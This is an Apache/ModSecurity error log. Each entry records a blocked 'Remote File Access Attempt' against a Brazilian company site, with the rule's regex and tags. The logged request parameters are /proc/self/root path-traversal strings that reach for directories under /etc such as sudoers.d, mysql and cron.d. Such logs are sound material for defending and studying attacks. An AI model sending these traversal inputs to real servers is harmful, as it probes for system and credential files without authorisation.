[Tue Mar 17 08:50:14.774904 2026] [:error] [pid 7000:tid 140411632822016] [client 74.7.241.46:58786] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_9hePVOt35XCGZP8qRgAAA40"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:15.774090 2026] [:error] [pid 1961:tid 140411725141760] [client 74.7.243.203:49020] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_93RXaaWotPICgYsfUQAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:16.117382 2026] [:error] [pid 2305:tid 140411599251200] [client 74.7.241.46:58802] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_-AQohV2v-7oj5HH1tgAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:17.306885 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.46:58812] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_-aBJNF7axNlVR0X3xwAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:18.615257 2026] [:error] [pid 2325:tid 140411716749056] [client 74.7.241.46:49654] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_-u82sZHvlq4xgHq91wAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:18.753890 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.243.203:49026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_-u82sZHvlq4xgHq92AAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:19.920698 2026] [:error] [pid 11293:tid 140411624429312] [client 74.7.241.46:49658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_-9CmCSWTlPouqorGQAAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:20.023424 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.203:49032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk__KBJNF7axNlVR0X3yQAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:21.251223 2026] [:error] [pid 7437:tid 140411666392832] [client 74.7.241.46:49662] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk__QeiSKl8TjouI-b8fgAAA8k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:21.323964 2026] [:error] [pid 1961:tid 140411658000128] [client 74.7.243.203:33640] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk__XRXaaWotPICgYsfUwAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:22.715702 2026] [:error] [pid 2325:tid 140411607643904] [client 74.7.241.46:49674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk__u82sZHvlq4xgHq92gAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:23.971129 2026] [:error] [pid 1210:tid 140411649607424] [client 74.7.243.203:33656] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk__1KJy4A1bGlmj9BQCwAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:24.014549 2026] [:error] [pid 1016:tid 140411632822016] [client 74.7.241.46:49678] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAAJqmL8PQht4WJFlCNAAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:25.947201 2026] [:error] [pid 1210:tid 140411699963648] [client 74.7.241.46:49686] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAAVKJy4A1bGlmj9BQDAAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:25.951125 2026] [:error] [pid 7000:tid 140411565680384] [client 74.7.243.203:33664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAARePVOt35XCGZP8qTgAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:27.293703 2026] [:error] [pid 11469:tid 140411557287680] [client 74.7.243.203:33676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAA5DEJR9VXonE_-1ImwAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:28.419215 2026] [:error] [pid 2305:tid 140411641214720] [client 74.7.241.46:49702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablABAQohV2v-7oj5HH1vwAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:29.783317 2026] [:error] [pid 1016:tid 140411574073088] [client 74.7.241.46:55734] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablABZqmL8PQht4WJFlCOAAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:29.820467 2026] [:error] [pid 7000:tid 140411733534464] [client 74.7.243.203:33686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablABRePVOt35XCGZP8qUQAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:32.088282 2026] [:error] [pid 11293:tid 140411658000128] [client 74.7.241.46:55738] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablACNCmCSWTlPouqorGRwAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:33.429250 2026] [:error] [pid 11293:tid 140411666392832] [client 74.7.241.46:55748] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablACdCmCSWTlPouqorGSQAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
